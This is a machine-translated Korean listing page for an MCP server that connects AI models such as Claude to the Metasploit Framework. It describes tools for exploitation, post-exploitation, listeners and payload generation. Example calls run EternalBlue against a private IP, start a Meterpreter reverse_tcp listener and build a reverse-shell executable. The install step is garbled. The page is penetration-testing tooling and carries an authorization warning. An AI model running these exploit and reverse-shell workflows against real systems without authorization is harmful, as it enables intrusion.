Metasploit MCP Server

by GH05TCREW
Verified

local-only server

The server can only run on the client’s local machine because it depends on local resources.

Integrations

  • Provides a bridge to the Metasploit Framework penetration testing platform, enabling exploitation workflows, payload generation and execution, post-exploitation tools, listener management, and auxiliary module support.

메타스플로잇 MCP 서버

Metasploit Framework 통합을 위한 MCP(Model Context Protocol) 서버.

설명

이 MCP 서버는 Claude와 같은 대규모 언어 모델과 Metasploit Framework 침투 테스트 플랫폼을 연결하는 다리 역할을 합니다. AI 지원 담당자가 표준화된 도구를 통해 Metasploit 기능에 동적으로 접근하고 제어할 수 있도록 지원하여 복잡한 보안 테스트 워크플로에 자연어 인터페이스를 제공합니다.

특징

페이로드 생성 및 실행

  • generate_payload : Metasploit RPC를 사용하여 페이로드 파일을 생성합니다(파일을 로컬에 저장)
  • execute_local_program : 로컬에 저장된 프로그램(예: 생성된 페이로드)을 실행합니다.

악용 워크플로

  • list_exploits : 사용 가능한 Metasploit 익스플로잇 모듈을 검색하고 나열합니다.
  • list_payloads : 사용 가능한 Metasploit 페이로드 모듈을 검색하고 나열합니다.
  • run_exploit : 타겟에 대한 익스플로잇을 구성하고 실행합니다.
  • list_active_sessions : 현재 Metasploit 세션 표시
  • send_session_command : 활성 세션에서 명령을 실행합니다.

착취 후 도구

  • get_system_info : Meterpreter 세션에서 시스템 정보를 검색합니다.
  • get_user_id : 세션의 현재 사용자 컨텍스트를 가져옵니다.
  • list_processes : 대상 시스템에서 실행 중인 프로세스를 나열합니다.
  • migrate_process : Meterpreter 세션을 다른 프로세스로 이동합니다.
  • filesystem_list : 대상 시스템의 디렉토리에 있는 파일을 나열합니다.

청취자 관리

  • list_listeners : 모든 활성 핸들러 및 백그라운드 작업을 표시합니다.
  • start_listener : 연결을 수신하기 위한 새로운 멀티/핸들러를 생성합니다.
  • stop_job : 실행 중인 작업이나 핸들러를 종료합니다.

보조 모듈 지원

  • run_auxiliary_module : 옵션을 사용하여 Metasploit 보조 모듈을 실행합니다.

필수 조건

  • Metasploit Framework가 설치되고 msfrpcd가 실행 중입니다.
  • Python 3.10 이상
  • 필수 Python 패키지(requirements.txt 참조)

설치

  1. 이 저장소를 복제하세요
  2. 종속성 설치:지엑스피1
  3. 환경 변수 구성(선택 사항):
    MSF_PASSWORD=yourpassword MSF_SERVER=127.0.0.1 MSF_PORT=55553 MSF_SSL=false PAYLOAD_SAVE_DIR=/path/to/save/payloads # Optional: Where to save generated payloads

용법

Metasploit RPC 서비스를 시작합니다.

msfrpcd -P yourpassword -S -a 127.0.0.1 -p 55553

Claude Desktop 통합을 위해 claude_desktop_config.json 구성합니다.

{ "mcpServers": { "metasploit": { "command": "uv", "args": [ "--directory", "C:\\path\\to\\MetasploitMCP", "run", "MetasploitMCP.py" ], "env": { "MSF_PASSWORD": "yourpassword" } } } }

보안 고려 사항

⚠️ 중요 보안 경고 :

이 도구는 강력한 익스플로잇 기능을 포함한 Metasploit Framework 기능에 직접 액세스할 수 있도록 합니다. 보안 테스트를 수행할 수 있는 명시적인 권한이 있는 환경에서만 책임감 있게 사용하십시오.

  • 실행하기 전에 항상 모든 명령을 검증하고 검토하세요.
  • 분리된 테스트 환경이나 적절한 권한이 있는 경우에만 실행하세요.
  • 사후 공격 명령으로 인해 시스템에 상당한 수정이 발생할 수 있음을 알아 두십시오.

예제 워크플로

기본 착취

  1. 사용 가능한 익스플로잇 목록: list_exploits("ms17_010")
  2. 익스플로잇을 선택하고 실행합니다: run_exploit("exploit/windows/smb/ms17_010_eternalblue", "192.168.1.100", 445)
  3. 세션 목록: list_active_sessions()
  4. 명령 실행: send_session_command(1, "whoami")

착취 이후

  1. 시스템 정보 가져오기: get_system_info(1)
  2. 실행 중인 프로세스 나열: list_processes(1)
  3. 더 안정적인 프로세스로 마이그레이션: migrate_process(1, 1234)
  4. 파일 시스템 탐색: filesystem_list(1, "C:\\Users")

핸들러 관리

  1. 리스너 시작: start_listener("windows/meterpreter/reverse_tcp", "192.168.1.10", 4444)
  2. 활성 핸들러 나열: list_listeners()
  3. 페이로드 생성: generate_payload("windows/meterpreter/reverse_tcp", "exe", {"LHOST": "192.168.1.10", "LPORT": 4444})
  4. 핸들러 중지: stop_job(1)

구성 옵션

페이로드 저장 디렉토리

기본적으로 generate_payload 로 생성된 페이로드는 홈 폴더의 payloads 디렉터리( ~/payloads 또는 C:\Users\YourUsername\payloads )에 저장됩니다. PAYLOAD_SAVE_DIR 환경 변수를 설정하여 이 위치를 사용자 지정할 수 있습니다.

환경 변수 설정:

  • 윈도우(PowerShell) :
    $env:PAYLOAD_SAVE_DIR = "C:\custom\path\to\payloads"
  • Windows(명령 프롬프트) :
    set PAYLOAD_SAVE_DIR=C:\custom\path\to\payloads
  • 리눅스/맥OS :
    export PAYLOAD_SAVE_DIR=/custom/path/to/payloads
  • Claude Desktop 구성에서 :
    "env": { "MSF_PASSWORD": "yourpassword", "PAYLOAD_SAVE_DIR": "C:\\your\\actual\\path\\to\\payloads" // Only add if you want to override the default }

참고: 사용자 지정 경로를 지정하는 경우, 해당 경로가 존재하는지 또는 애플리케이션에 해당 경로를 생성할 권한이 있는지 확인하세요. 경로가 유효하지 않으면 페이로드 생성이 실패할 수 있습니다.

특허

아파치 2.0

-
security - not tested
A
license - permissive license
-
quality - not tested

대규모 언어 모델과 Metasploit Framework 간의 브리지를 제공하여 AI 도우미가 자연어로 침투 테스트 기능에 액세스하고 제어할 수 있도록 합니다.

  1. Description
    1. Features
      1. Payload Generation and Execution
      2. Exploitation Workflow
      3. Post-Exploitation Tools
      4. Listener Management
      5. Auxiliary Module Support
    2. Prerequisites
      1. Installation
        1. Usage
          1. Security Considerations
            1. Example Workflows
              1. Basic Exploitation
              2. Post-Exploitation
              3. Handler Management
            2. Configuration Options
              1. Payload Save Directory
            3. License
              ID: vmkfe6ftya